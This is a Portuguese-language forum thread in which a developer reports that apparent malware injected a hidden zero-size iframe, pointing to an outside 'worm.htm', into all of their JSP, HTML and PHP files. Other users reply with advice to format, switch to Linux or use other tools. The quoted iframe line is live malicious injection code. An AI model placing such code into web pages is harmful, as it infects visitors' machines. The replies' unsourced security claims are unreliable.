Vírus nas páginas JSP

Olá, estava a trabalhar normalmente quando de repente creio ter sido atacado por um vírus.
O NetBeans perdeu a referência do atalho no windows, precisando eu procurar ele nas pastas de programas. Foi preciso instalar novamente o JDK.
Dentro dos meus projetos, em todas as pastas, foi adicionado um arquivo .ini chamado Desktop_.ini onde dentro contém a data atual.
E a outra coisa estranha foi que em muitos dos meu includes JSP dos meus projetos foi adicionado um
script html com iframe, chamando para uma outra página, ou seja, um worm.

<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>

Alguém ai ja passou por isso e sabe com remover essa bagaça ? Uso o Avast como antivírus.

Atualizado: o Script foi adicionado em todos arquivos JSP,html e php que eu tenho na máquina.

Uau… kct, deste jeito assim fica dificil, nunca tinha visto este tipo de ataque não :shock:

Mas acho que a forma mais segura e eficaz de remover um virus… e format c:… :frowning:

Derepente num desses fórums de algumacoisa-ware da vida te ajudam. Por mim você tira o Ruindows e bota uma distro linux.

Concordo com o Fiaux, tire o ruindows e coloque Linux, mais caso não queira, você provavelmente terá que formatar seu computador, e colocar um anti virus bom na proxima e não ao avast, recomendo a você usar o Spyware Terminator + Clamwin

mais eu nunca vi nada do genero, para dizer que não, vi já vi em paginas em php, mais a solução era mesmo formatar o computador, afinal worms não saem com anti virus ou removedor, eles continuam gravados nas chaves importantes dos registros do windows, estas nenhum removedor ou anti virus limpa para evitar danos ao computador…

não garanto eficácia porém acho que esta solução lhe resolverá alguns problemas

http://baixaki.ig.com.br/download/advanced-systemcare.htm

espero ter ajudado…mais se quiser tente instalar o ubuntu 8.10 e caso não tenha outra solução a não ser usar windows para algumas aplicações use elas em maquina virtual eu fiz isto no meu notebook, é otimo principalmente que eu sei que os meus arquivos sempre estarão a salvo de worms e trojan horse :smiley: